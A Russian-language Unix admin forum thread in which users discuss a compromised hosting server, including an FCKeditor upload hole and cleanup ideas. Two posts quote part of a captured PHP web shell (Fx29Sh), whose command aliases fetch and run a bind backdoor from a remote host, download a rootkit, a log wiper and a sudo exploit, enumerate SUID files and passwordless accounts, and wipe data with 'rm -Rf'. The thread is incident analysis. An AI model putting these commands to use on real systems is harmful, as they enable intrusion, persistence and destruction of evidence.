поломали сервак

Проблемы установки, настройки и работы Правильной Операционной Системы

Модератор: terminus

Правила форума
Убедительная просьба юзать теги [cоde] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: поломали сервак

Непрочитанное сообщение zg » 2009-10-15 18:21:00

Laa писал(а):По pid можно найти сам файл через fstat.
:good: сенкс, буду знать
Laa писал(а):Заставь юзеров удалить установленные phpmyadmin и тому подобный софт, который доступен всем рыскающим хакерам для попыток взлома.
проще хостинг пристрелить :smile: там этого "добра" пруд пруди.

не знаю почему, но спама уже вторые сути нет :smile: Надоело видать с кроном спорить.

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
Laa
ст. лейтенант
Сообщения: 1032
Зарегистрирован: 2008-02-21 18:25:33
Откуда: Украина, Россия

Re: поломали сервак

Непрочитанное сообщение Laa » 2009-10-15 19:12:42

Сам недавно подобные сопли [классический секс].
Разгреб -- оказалось проломили какой-то fckеditor, типа какой-то веб-редактор для чего-то, я не вникал, его еще предыдущие разработчики оставили, да еще и древнюю версию. Хакеры его ломанули и через него влили пару своих скриптов, потом бэкдур. Свои скрипты они попрятали в images/ где куча картинок на несколько экранов, но я это обнаружил в логах, так что им не удалось увести с глаз скрипт. пхп программулина их была вся закодирована в base64, ее код сразу и не виден и не бросается в глаза, просто base64-символы и в конце раскрытые через base64_decode.

Бэкдур планировался rathole-1.2.tar.gz, я его так и не нашел. :Search: сам пхп-скрипт после раскрытия из base64 лез http://uaedesign.com/xml/ за доп архивами, который он собирался распаковать, я их позже не смог скачать (вроде там для моего ИП был уже запрет).

Часть кода этого пхп-файла:

Код: Выделить всё

#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##
define('sh_ver',"");        ##
## By FaTaLisTiCz_Fx                 ##
## б? 03-09 2008 FeeLCoMz Community   ##
## Written under PHP 5.2.5           ##
#######################################
$sh_name = sh_name();                ##
#######################################
#$sh_mainurl        = "http://localhost/FX29SH/";
$sh_mainurl        = "http://uaedesign.com/xml/";
$fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
  "Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
  "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
  "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
...
...
  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
exim: помните, что выдавая deny, вы можете недоставить ваше же письмо, зарубив sender-verify удаленного MTA к вашему MTA!!!

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: поломали сервак

Непрочитанное сообщение zg » 2009-10-15 19:42:18

Laa писал(а):Разгреб -- оказалось проломили какой-то fckеditor
:-D знаем, ломали. Там фишка в том, что есть коннектор, который может файлы принимать на сервер. Вот просто и передают файл, фсикей его принимает и сохраняет по известному пути, собственно и всё. Защита только одна - авторизация апача на всю админку.

но бэкдоры обычно легко грепаются... а тут я ничё так и не нашёл.

Аватара пользователя
thefree
лейтенант
Сообщения: 980
Зарегистрирован: 2008-12-29 9:23:19
Откуда: Весёлая Страна

Re: поломали сервак

Непрочитанное сообщение thefree » 2009-10-20 16:30:18

как там дела? скрипт не показался?
Не судите меня строго, Я не волшебник, а только учусь!
http://planetbsd.ru - RSS-агрегатор *BSD по Рунету

reLax
лейтенант
Сообщения: 638
Зарегистрирован: 2007-04-08 5:50:16

Re: поломали сервак

Непрочитанное сообщение reLax » 2009-10-24 10:28:31

Успехи есть ?

reLax
лейтенант
Сообщения: 638
Зарегистрирован: 2007-04-08 5:50:16

Re: поломали сервак

Непрочитанное сообщение reLax » 2009-10-24 10:32:02

Laa писал(а):Сам недавно подобные сопли [классический секс].
Разгреб -- оказалось проломили какой-то fckеditor, типа какой-то веб-редактор для чего-то, я не вникал, его еще предыдущие разработчики оставили, да еще и древнюю версию. Хакеры его ломанули и через него влили пару своих скриптов, потом бэкдур. Свои скрипты они попрятали в images/ где куча картинок на несколько экранов, но я это обнаружил в логах, так что им не удалось увести с глаз скрипт. пхп программулина их была вся закодирована в base64, ее код сразу и не виден и не бросается в глаза, просто base64-символы и в конце раскрытые через base64_decode.

Бэкдур планировался rathole-1.2.tar.gz, я его так и не нашел. :Search: сам пхп-скрипт после раскрытия из base64 лез http://uaedesign.com/xml/ за доп архивами, который он собирался распаковать, я их позже не смог скачать (вроде там для моего ИП был уже запрет).

Часть кода этого пхп-файла:

Код: Выделить всё

#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##
define('sh_ver',"");        ##
## By FaTaLisTiCz_Fx                 ##
## б? 03-09 2008 FeeLCoMz Community   ##
## Written under PHP 5.2.5           ##
#######################################
$sh_name = sh_name();                ##
#######################################
#$sh_mainurl        = "http://localhost/FX29SH/";
$sh_mainurl        = "http://uaedesign.com/xml/";
$fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
  "Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
  "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
  "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
...
...
  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
Детсад. safe_mode=ON (Что в принципе Zingel и ранее сказал)
По сути команды вызываются exec() passthru() proc_open() shell_exec() system() насколько я помню PHP.

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: поломали сервак

Непрочитанное сообщение zg » 2009-10-24 10:39:55

reLax писал(а):Успехи есть ?
сервак пашет :smile: спама нет, дырку так и не нашёл, но заплатка всё ещё стоит в кроне, поэтому уже забил :roll:

reLax
лейтенант
Сообщения: 638
Зарегистрирован: 2007-04-08 5:50:16

Re: поломали сервак

Непрочитанное сообщение reLax » 2009-10-24 10:43:24

zg писал(а):
reLax писал(а):Успехи есть ?
сервак пашет :smile: спама нет, дырку так и не нашёл, но заплатка всё ещё стоит в кроне, поэтому уже забил :roll:
ну раз лень - засунь их всех в клетки и разреши 80 порт входящий с родительской системы (и если нужно FTP) и max-conn-rate исходящих в случае если из тебя ботнет сделали )) И хрен с ними, тогда уже точно можешь забить :)